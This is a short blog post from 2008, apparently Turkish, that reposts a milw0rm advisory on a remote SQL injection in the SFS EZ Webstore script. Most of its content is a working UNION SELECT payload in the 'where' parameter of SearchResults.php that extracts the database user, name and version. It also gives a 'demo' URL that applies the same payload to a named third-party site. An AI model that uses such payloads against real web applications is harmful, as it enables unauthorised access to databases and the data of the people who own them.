"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

1 Kasım 2008 Cumartesi

SFS EZ Webstore (where) Remote SQL Injection Vulnerability

SFS EZ Webstore (where) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/6922

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]

[SQL]=

ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

demo

http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*


0 yorum:

 
Dizi